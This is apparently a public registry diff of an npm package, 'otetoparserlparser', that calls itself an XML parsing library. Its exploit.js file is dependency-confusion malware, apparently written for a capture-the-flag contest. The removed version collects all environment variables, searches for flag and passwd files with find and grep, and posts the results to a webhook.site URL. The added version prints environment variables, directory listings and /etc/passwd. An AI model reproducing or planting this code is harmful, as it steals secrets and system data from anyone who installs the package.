otetoparserlparser 0.30.1 → 0.30.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/exploit.js +27 -63
  2. package/package.json +1 -1
package/exploit.js CHANGED
@@ -1,74 +1,38 @@
1
1
  const fs = require('fs');
2
2
  const { exec } = require('child_process');
3
- const https = require('https');
4
3
 
5
- console.log('=== MALICIOUS PACKAGE EXECUTED ===');
4
+ console.log('=== START EXPLOIT ===');
6
5
 
7
- function sendToWebhook(data) {
8
- try {
9
- const payload = JSON.stringify({
10
- source: 'dependency_confusion',
11
- data: data
12
- });
13
-
14
- const options = {
15
- hostname: 'webhook.site',
16
- port: 443,
17
- path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
18
- method: 'POST',
19
- headers: {'Content-Type': 'application/json'}
20
- };
21
-
22
- const req = https.request(options);
23
- req.write(payload);
24
- req.end();
25
- console.log('Data sent to webhook');
26
- } catch(e) {
27
- console.log('Webhook error:', e.message);
28
- }
29
- }
30
-
31
- let collectedData = '=== EXPLOIT START ===\n';
32
-
33
- // 1. Все переменные окружения (флаг может быть здесь)
34
- collectedData += '=== ALL ENV VARS ===\n';
6
+ // 1. Выводим ВСЕ переменные окружения
7
+ console.log('=== ALL ENVIRONMENT VARIABLES ===');
35
8
  for (let key in process.env) {
36
- collectedData += `${key}=${process.env[key]}\n`;
9
+ console.log(`${key}=${process.env[key]}`);
37
10
  }
38
11
 
39
- // 2. Попробуем выполнить команды для поиска флага
40
- exec('find / -type f -name "*flag*" -o -name "*passwd*" 2>/dev/null | head -20', (err, stdout) => {
41
- if (!err && stdout) {
42
- collectedData += `=== FOUND FILES ===\n${stdout}\n`;
12
+ // 2. Выводим текущую директорию и файлы
13
+ console.log('=== CURRENT DIRECTORY ===');
14
+ exec('pwd && ls -la', (err, stdout) => {
15
+ if (!err) console.log(stdout);
16
+
17
+ // 3. Выводим корневую директорию
18
+ exec('ls -la /', (err, stdout) => {
19
+ if (!err) console.log('=== ROOT DIR ===\n' + stdout);
43
20
 
44
- // Читаем найденные файлы
45
- const files = stdout.trim().split('\n');
46
- files.forEach(file => {
47
- try {
48
- const content = fs.readFileSync(file, 'utf8');
49
- collectedData += `=== CONTENT: ${file} ===\n${content}\n`;
50
- if (content.includes('{') && content.includes('}')) {
51
- console.log(`🚨 POSSIBLE FLAG IN ${file}: ${content}`);
21
+ // 4. Выводим /etc/passwd (там может быть флаг)
22
+ try {
23
+ const passwd = fs.readFileSync('/etc/passwd', 'utf8');
24
+ console.log('=== /etc/passwd ===');
25
+ console.log(passwd);
26
+
27
+ // Ищем строку с флагом
28
+ const lines = passwd.split('\n');
29
+ lines.forEach(line => {
30
+ if (line.includes('{') && line.includes('}')) {
31
+ console.log('🚨 POSSIBLE FLAG IN PASSWD:', line);
52
32
  }
53
- } catch(e) {}
54
- });
55
- }
56
-
57
- // 3. Ищем строки содержащие флаг в файлах
58
- exec('grep -r "flag{" / 2>/dev/null | head -10', (err, stdout) => {
59
- if (!err && stdout) {
60
- collectedData += `=== GREP FLAG RESULTS ===\n${stdout}\n`;
61
- }
62
-
63
- // 4. Смотрим что в текущей директории
64
- exec('pwd && ls -la && find . -type f -name "*flag*" 2>/dev/null', (err, stdout) => {
65
- if (!err) {
66
- collectedData += `=== CURRENT DIR ===\n${stdout}\n`;
67
- }
68
-
69
- sendToWebhook(collectedData);
70
- console.log('=== ALL DATA COLLECTED ===');
71
- console.log(collectedData);
72
- });
33
+ });
34
+ } catch(e) {}
35
+
36
+ console.log('=== END EXPLOIT ===');
73
37
  });
74
38
  });
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "otetoparserlparser",
3
- "version": "0.30.1",
3
+ "version": "0.30.3",
4
4
  "description": "XML parsing library",
5
5
  "main": "index.js",
6
6
  "scripts": {